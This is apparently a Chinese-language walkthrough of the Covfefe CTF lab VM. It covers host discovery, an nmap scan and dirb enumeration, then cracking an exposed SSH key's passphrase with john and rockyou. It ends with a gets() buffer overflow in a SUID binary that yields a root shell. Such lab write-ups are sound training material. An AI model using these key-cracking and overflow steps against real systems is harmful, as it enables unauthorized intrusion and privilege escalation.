**
一、探测靶场地址
探测之前要注意攻击机的网络连接模式是桥接模式。关于虚拟机的网络模式的选择的原因。
**
root@kali:~# netdiscover -r 192.168.1.1/24
这里解释一下:
- Netdiscover是一个主动/被动的ARP侦查工具。该工具在不使用DHCP的无线网络上非常有用。使用Netdiscover工具可以在网络上扫描IP地址,ARP侦查工具Netdiscover检查在线主机或搜索为它们发送的ARP请求。用来发现局域网中的主机。
2.DHCP(Dynamic Host Configuration Protocol,动态主机配置协议)通常被应用在大型的局域网络环境中,主要作用是集中的管理、分配IP地址,使网络环境中的主机动态的获得IP地址、Gateway地址、DNS服务器地址等信息,并能够提升地址的使用率。
DHCP协议采用客户端/服务器模型,主机地址的动态分配任务由网络主机驱动。当DHCP服务器接收到来自网络主机申请地址的信息时,才会向网络主机发送相关的地址配置等信息,以实现网络主机地址信息的动态配置。
**
二、测试主机与靶场的连通性
**
root@kali:~# ping
以上证明两个机器之间已经联通,之后我们进行实验。
**
三、端口扫描
**
root@kali:~# nmap -sV 192.168.1.107
root@kali:~# nmap -sV 192.168.1.107
扫描结果:
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2019-07-04 21:37 CST
Nmap scan report for 192.168.1.107
Host is up (0.00013s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10 (protocol 2.0)
80/tcp open http nginx 1.10.3
31337/tcp open http Werkzeug httpd 0.11.15 (Python 3.5.3)
MAC Address: 08:00:27:50:7F:AC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.79 seconds
**
四、分析探测结果
**
http://192.168.1.107:31337/
查看页面源代码,没有获得信息。
**
五、探测隐藏文件
**
root@kali:~# dirb http://192.168.1.107:31337/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Jul 5 17:25:10 2019
URL_BASE: http://192.168.1.107:31337/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.107:31337/ ----
+ http://192.168.1.107:31337/.bash_history (CODE:200|SIZE:19)
+ http://192.168.1.107:31337/.bashrc (CODE:200|SIZE:3526)
+ http://192.168.1.107:31337/.profile (CODE:200|SIZE:675)
+ http://192.168.1.107:31337/.ssh (CODE:200|SIZE:43)
+ http://192.168.1.107:31337/robots.txt (CODE:200|SIZE:70)
-----------------
END_TIME: Fri Jul 5 17:25:24 2019
DOWNLOADED: 4612 - FOUND: 5
可以看到五个搜索结果。
首先我们打开敏感文件(robot.txt):
User-agent: *
Disallow: /.bashrc
Disallow: /.profile
Disallow: /taxes
打开敏感文件,得到flag值:
查到私钥,公钥文件。在这里我们不需要下载公钥,因为公钥是存在服务器上的。
**
六、登陆ssh
**
root@kali:~# cd 桌面/
root@kali:~/桌面# ls -alh
总用量 16K
drwxr-xr-x 2 root root 4.0K 7月 5 17:32 .
drwxr-xr-x 29 root root 4.0K 7月 5 17:32 ..
-r-------- 1 root root 395 7月 5 17:32 authorized_keys
-r-------- 1 root root 1.8K 7月 5 17:31 id_rsa
root@kali:~/桌面# chmod 777 id_rsa
root@kali:~/桌面#
文件名赋权限,用私钥登陆ssh服务。
有了私钥之后,我们登陆还需要密码:
root@kali:~/桌面# ssh -i id_rsa [email protected]
The authenticity of host '192.168.1.107 (192.168.1.107)' can't be established.
ECDSA key fingerprint is SHA256:5Tmg/FD7Iga/sFY/1z4etq44S8/bmokfg3R3VyjHtVM.
Are you sure you want to continue connecting (yes/no)? y
Please type 'yes' or 'no': yes
Warning: Permanently added '192.168.1.107' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':
破解ssh私钥:
root@kali:~/桌面# ssh2john id_rsa >tsacrack //转化为john可识别信息。
root@kali:~/桌面# ls -al
总用量 20
drwxr-xr-x 2 root root 4096 7月 5 17:44 .
drwxr-xr-x 29 root root 4096 7月 5 17:32 ..
-r-------- 1 root root 395 7月 5 17:32 authorized_keys
-rw------- 1 root root 1766 7月 5 17:31 id_rsa
-rw-r--r-- 1 root root 3553 7月 5 17:46 tsacrack //转化完毕
root@kali:~/桌面# zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules tsacrack //进行解密
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA 32/64])
Press Ctrl-C to abort, or send SIGUSR1 to john process for status
starwars (id_rsa ) //解密结果
1g 0:00:00:00 9.090g/s 6081p/s 6081c/s 6081C/s starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/桌面# ssh -i id_rsa [email protected] //登陆ssh
Enter passphrase for key 'id_rsa':
Linux covfefe 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
simon@covfefe:~$
simon@covfefe:~$ pwd //pwd命令pwd是Print Working Directory的缩写,其功能是显示当前所在工作目录的全路径。主要用在当不确定当前所在位置时,通过pwd来查看当前目录的绝对路径。
/home/simon
simon@covfefe:~$ ls
http_server.py robots.txt
simon@covfefe:~$ cd /root // /root 目录是root用户在别的用户上创建的目录,别的用户不具有root权限无法访问/
simon@covfefe:/root$ ls
flag.txt read_message.c
simon@covfefe:/root$ cat flag.txt
cat: flag.txt: Permission denied
simon@covfefe:/root$ find / -perm -4000 2>/dev/null //找具有root执行权限的文件
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/local/bin/read_message //此文件跟root下的read_message.c类似,我们查看一下。
/bin/umount
/bin/su
/bin/mount
/bin/ping
simon@covfefe:/root$ cat read_message.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
// You're getting close! Here's another flag:
// flag2{use_the_source_luke}
int main(int argc, char *argv[]) {
char program[] = "/usr/local/sbin/message";
char buf[20]; //根据缓冲区溢出。
char authorized[] = "Simon";
printf("What is your name?\n");
gets(buf);
// Only compare first five chars to save precious cycles:
if (!strncmp(authorized, buf, 5)) {
printf("Hello %s! Here is your message:\n\n", buf);
// This is safe as the user can't mess with the binary location:
execve(program, NULL, NULL);
} else {
printf("Sorry %s, you're not %s! The Internet Police have been informed of this violation.\n", buf, authorized);
exit(EXIT_FAILURE);
}
}
simon@covfefe:/root$ read_message
What is your name?
simonAAAAAAAAAAAAAAA/bin/sh
Sorry simonAAAAAAAAAAAAAAA/bin/sh, you're not Simon! The Internet Police have been informed of this violation.
simon@covfefe:/root$ read_message
What is your name?
SimonAAAAAAAAAAAAAAA/bin/sh
Hello SimonAAAAAAAAAAAAAAA/bin/sh! Here is your message:
# pwd //进入root目录下。
/root
# cat flag.txt
You did it! Congratulations, here's the final flag:
flag3{das_bof_meister}
#
小结:
netdiscover -r 192.168.1.1/24 //扫描局域网内存活的主机
ping 192.168.1.107 //测试连通性
dirb http://192.68.1.107:31337//查看隐藏目录
ssh -i 私钥 用户名@ip地址 //登陆ssh
ssh2john 私钥文件 > isacrack //将私钥文件转化为john可识别文件。
zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules tsacrack //进行解密
第一个文件是kali自带的字典。
pwd //查看当前路径
find / -perm -4000 2>/dev/null
或者
find /home -user root -ls
linux中 /dev/null命令
禁止标准错误
[root@zhoucentos log]# rm filename1
rm: 无法删除"filename1": 没有那个文件或目录
[root@zhoucentos log]# rm filename1 2>/dev/null